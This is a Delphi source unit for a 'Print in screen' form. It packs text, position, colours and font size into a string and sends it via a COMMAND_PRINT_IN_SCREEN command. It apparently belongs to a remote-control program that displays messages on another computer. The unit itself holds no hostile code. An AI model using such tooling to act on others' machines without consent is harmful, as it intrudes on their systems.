(***********************************************************************
************************************************************************
****                                                                ****
****                                                                ****
****     File Name: untPrintScreen.pas                              ****
****                                                                ****
****     Author: //hIDRA_5                                          ****
****                                                                ****
****     Description: Unit main of PrintScreen form                 ****
****                                                                ****
****                                                                ****
************************************************************************
************************************************************************)

unit untPrintScreen;

interface

uses
  SysUtils, Graphics, Classes, Controls, Forms, StdCtrls,
  ExtCtrls, Buttons, Spin;

type
  TfrmPrintScreen = class(TForm)
    MemText: TMemo;
    GruPos: TGroupBox;
    RdoCenter: TRadioButton;
    RdoCustom: TRadioButton;
    LblX: TLabel;
    EdtX: TEdit;
    LblY: TLabel;
    EdtY: TEdit;
    GroupBox1: TGroupBox;
    Label8: TLabel;
    Label3: TLabel;
    Label4: TLabel;
    PntBack: TPanel;
    PntFont: TPanel;
    SpdPrintText: TSpeedButton;
    SpdClear: TSpeedButton;
    SpnFontSize: TSpinEdit;
    procedure PntBackClick(Sender: TObject);
    procedure RdoCustomClick(Sender: TObject);
    procedure EnableCnts(nState:Boolean);
    procedure SpdClearClick(Sender: TObject);
    procedure SpnFontSizeChange(Sender: TObject);
    procedure SpdPrintTextClick(Sender: TObject);
    procedure FormCreate(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  frmPrintScreen: TfrmPrintScreen;

implementation

uses untMain, untCommands, untColors;

{$R *.DFM}

procedure TfrmPrintScreen.PntBackClick(Sender: TObject);
begin
   frmColors.GlobalColor(Sender);
end;

procedure TfrmPrintScreen.RdoCustomClick(Sender: TObject);
begin
   EnableCnts(Sender = RdoCustom);
end;

procedure TfrmPrintScreen.EnableCnts(nState:Boolean);
begin
   LblX.Enabled:=nState;
   LblY.Enabled:=nState;
   EdtX.Enabled:=nState;
   EdtY.Enabled:=nState;
end;

procedure TfrmPrintScreen.SpdClearClick(Sender: TObject);
begin
   MemText.Clear;
end;

procedure TfrmPrintScreen.SpnFontSizeChange(Sender: TObject);
begin
   MemText.Font.Size:=StrToIntDef(Trim(SpnFontSize.Text),8);
end;

procedure TfrmPrintScreen.SpdPrintTextClick(Sender: TObject);
var
   cPrintSrc,c:string;
begin
   c:=Chr(13);
   cPrintSrc:=IntToStr(Integer(RdoCenter.Checked)) + c +
              Trim(EdtX.Text) + c + Trim(EdtY.Text) + c +
              ColorToString(PntBack.Color) + c + ColorToString(PntFont.Color) + c +
              Trim(IntToStr(MemText.Font.Size)) + c + IntToStr(MemText.Lines.Count) + c + MemText.Text;
   frmMain.strStatus:='Printing text in screen...';
   frmMain.SendCommand(COMMAND_PRINT_IN_SCREEN,cPrintSrc);
end;

procedure TfrmPrintScreen.FormCreate(Sender: TObject);
begin
   Caption:='Print in screen';
end;

end.
